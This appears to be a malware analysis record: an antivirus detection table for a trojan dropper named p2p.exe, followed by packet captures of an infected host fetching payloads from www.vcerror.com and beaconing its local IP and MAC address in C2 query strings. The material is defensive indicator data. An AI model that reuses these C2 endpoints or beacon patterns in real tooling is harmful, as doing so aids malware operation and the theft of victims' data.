Download Attachments
| SHA256: | ef794b9a3b72ae5524e17ecccf330eb16f2cc74f3e7fe7cb2667acefdea4b3a3 |
| File name: | p2p.exe |
| Detection ratio: | 47 / 55 |
| Analysis date: | 2016-10-26 21:33:06 UTC ( 0 minutes ago ) |
| Antivirus | Result | Update |
|---|---|---|
| AVG | Generic37.DEP | 20161026 |
| AVware | Trojan.Win32.Generic!BT | 20161026 |
| Ad-Aware | Gen:Trojan.Heur.fmKfXCDIycnj | 20161026 |
| AegisLab | Troj.Dropper.W32.Injector!c | 20161026 |
| AhnLab-V3 | Malware/Win32.Generic.N1843405561 | 20161026 |
| Antiy-AVL | Trojan[Dropper]/Win32.Injector | 20161026 |
| Arcabit | Trojan.Heur.fmKfXCDIycnj | 20161026 |
| Avast | Win32:Rofin-A [Trj] | 20161026 |
| Avira (no cloud) | TR/Crypt.FKM.Gen | 20161026 |
2016-10-25 23:20:18.175277 IP 192.168.1.102.61056 > 123.57.11.22.80: Flags [P.], seq 0:292, ack 1, win 256, length 292: HTTP: GET /YW/p2p/p2p.exe HTTP/1.1
E..L..@…._…f{9…..PZ.VX….P…….GET /YW/p2p/p2p.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.vcerror.com
Connection: Keep-Alive
2016-10-25 23:20:18.419780 IP 192.168.1.102.61056 > 123.57.11.22.80: Flags [.], ack 2921, win 256, length 0
E..(..@……..f{9…..PZ.W|..%uP….V……..
—
E..(..@….a…f{9…..PD.=…+.P…C………
2016-10-25 23:20:26.821311 IP 192.168.1.102.61057 > 123.57.11.22.80: Flags [P.], seq 0:103, ack 1, win 256, length 103: HTTP: GET /YW/p2p/ver.dat HTTP/1.1
E…..@……..f{9…..PD.=…+.P…Q…GET /YW/p2p/ver.dat HTTP/1.1
User-Agent: TestIE/1.0
Host: www.vcerror.com
Connection: Keep-Alive
2016-10-25 23:20:26.823460 IP 192.168.1.102.61058 > 13.107.21.200.443: Flags [.], ack 6157, win 32754, length 0
E..(s.@……..f.k……….kx.SP………….
2016-10-25 23:20:26.853146 IP 192.168.1.102.61058 > 13.107.21.200.443: Flags [.], ack 6754, win 32680, length 0
E..(s.@……..f.k……….kx..P………….
2016-10-25 23:20:27.116031 IP 192.168.1.102.61057 > 123.57.11.22.80: Flags [.], ack 318, win 255, length 0
—
E..(..@….]…f{9…..P….,…P…D;……..
2016-10-25 23:20:27.513843 IP 192.168.1.102.61059 > 123.57.11.22.80: Flags [P.], seq 0:304, ack 1, win 256, length 304: HTTP: GET /YW/config/config.bin?ver=3.180&lip=192.168.32.132&mac=000C29184A91 HTTP/1.1
E..X..@….,…f{9…..P….,…P…….GET /YW/config/config.bin?ver=3.180&lip=192.168.32.132&mac=000C29184A91 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: www.vcerror.com
Connection: Close
Cache-Control: no-cache
2016-10-25 23:20:27.850658 IP 192.168.1.102.61059 > 123.57.11.22.80: Flags [.], ack 1297, win 251, length 0
—
E..(..@….V…f{9…..P.~.k…[P….A……..
2016-10-25 23:20:30.265197 IP 192.168.1.102.61060 > 123.57.11.22.80: Flags [P.], seq 0:364, ack 1, win 256, length 364: HTTP: GET /YW/txt/hello.txt?ver=3.180&uid=config&lip=192.168.32.132&mac=000C29184A91&p=0&b=0.0.0.0.0&md5=64663066353033343933653362333835 HTTP/1.1
E…..@……..f{9…..P.~.k…[P…….GET /YW/txt/hello.txt?ver=3.180&uid=config&lip=192.168.32.132&mac=000C29184A91&p=0&b=0.0.0.0.0&md5=64663066353033343933653362333835 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: www.vcerror.com
Connection: Close
Cache-Control: no-cache